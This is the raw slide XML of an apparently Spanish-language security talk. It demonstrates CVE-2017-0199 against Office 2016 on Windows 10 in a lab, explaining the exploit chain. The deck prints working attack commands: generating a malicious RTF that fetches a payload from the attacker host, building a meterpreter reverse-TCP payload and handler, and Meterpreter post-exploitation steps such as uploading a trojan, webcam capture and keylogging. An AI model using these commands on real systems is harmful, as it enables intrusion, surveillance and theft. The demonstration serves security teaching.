              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>migrate</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>manage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>multi_meterpreter_inject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> PAYLOAD=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>shell_bind_tcp</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>search</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> -f autoexec.bat</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>shell</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>upload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> evil_trojan.exe c:\\windows\\system32</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>webcam_list</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>webcam_snap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>screenshot</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>enum_applications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>enum_logged_on_users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>enum_shares</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>usb_history</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>use post/multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>recon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>local_exploit_suggester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/capture/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>keylog_recorder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>background</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>jobs</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>sessions</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>arp_scanner</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t> RHOSTS=192.168.1.0/24</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>run post/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>gather</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="1400" dirty="0" err="1"/>
              <a:t>checkvm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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3631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25" y="242887"/>
            <a:ext cx="8591550" cy="63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3124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37" y="285750"/>
            <a:ext cx="8772525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214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62179" y="1716833"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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755" y="3718768"/>
            <a:ext cx="4708848" cy="313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208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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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88024" y="1959428"/>
            <a:ext cx="531844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2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Atacante</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Parrot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Linux 3.5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>handler</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.193.128</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Victima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS Windows 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Updated</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MS Office 2016</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>192.168.193.1</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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5014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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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02434" y="1959428"/>
            <a:ext cx="1079551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UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2017-0199 nació como un 0-day que explotaba las últimas versiones de Microsoft Office, concretamente un RTF que se vio inicialmente en un manual militar en ruso con objetivos en la República de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Donestk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y que comprometía el PC de la víctima con sólo abrirlo (permitía RCE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Luego se usó también para instalar malware como </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Latentbot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> y en campañas del troyano bancario </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Dridex</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, aunque hasta ahora no había mucho detalle del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="28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53211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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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02434" y="1959428"/>
            <a:ext cx="1079551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UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2017-0199 – Riesgo total 7,8/10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY" sz="2800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Office 2007 SP3, Microsoft Office 2010 SP2, Microsoft Office 2013 SP1, Microsoft Office 2016, Microsoft Windows Vista SP2, Windows Server 2008 SP2, Windows 7 SP1, Windows 8.1 y Windows 10 permite ejecución remota de código arbitrario a través de un documento de MS Office especialmente diseñado, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>aka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> "Microsoft Office/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WordPad</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Code</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vulnerability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> w/Windows API."</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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6247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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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02434" y="1959428"/>
            <a:ext cx="1079551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UY" sz="2800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CVE-2017-0199 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:endParaRPr lang="es-UY" sz="2800" noProof="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-UY" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>1- Se envía documento especialmente diseñado con objeto OLE2 embebido</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-UY" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>2 – Usuario con versiones vulnerables abre el documento, winword.exe realiza request HTTP para ejecutar un archivo HTA malicioso </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-UY" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>3 – El archivo retornado por el server remoto es un RTF falso con un script malicioso </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-UY" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>4 - Winword.exe observa por application/hta en los objetos COM, lo que causa a la aplicacion (mshta.exe) cargar y ejecutar el script malicioso</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr fontAlgn="base"/>
            <a:r>
              <a:rPr lang="es-UY" noProof="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>5 – El script ejecuta un script Visual Basic que contiene commandos PowerShell </a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="3600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087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6068"/>
            <a:ext cx="12192000" cy="404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216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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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431" y="0"/>
            <a:ext cx="6933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1708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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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334" y="1697490"/>
            <a:ext cx="853440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722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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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67747" y="2127379"/>
            <a:ext cx="109261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es-UY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cve-2017-0199_toolkit.py -M gen -w Invoice.rtf -u http://192.168.193.128/Factura.doc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY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UY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msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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-p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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UY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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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UY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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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LHOST=192.168.193.128 LPORT=4444 -f exe &gt; /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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s-UY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/shell.exe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-UY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UY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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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-x "use multi/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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handler</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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set PAYLOAD </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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UY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meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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UY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reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY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set LHOST 192.168.193.128; run"</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY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4471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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Demo time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67747" y="2127379"/>
            <a:ext cx="1092614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This program is for Educational purpose ONLY. Do not use it without permission. The usual disclaimer applies, especially the fact that me (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>bhdresh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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This vulnerability was reproduced in a lab environment, and should not be used for bad purposes.</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill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2192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87534" y="214604"/>
            <a:ext cx="9144000" cy="1115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UY" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-UY" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="HACKED" panose="02000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>powers</a:t>
            </a:r>
            <a:endParaRPr lang="es-UY" sz="8000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:latin typeface="HACKED" panose="020005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7748" y="2127379"/>
            <a:ext cx="1066240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</a:rPr>
              <a:t>HTA </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>es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una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extensión</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> de un HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ejecutable</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>vienen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usando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desde</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
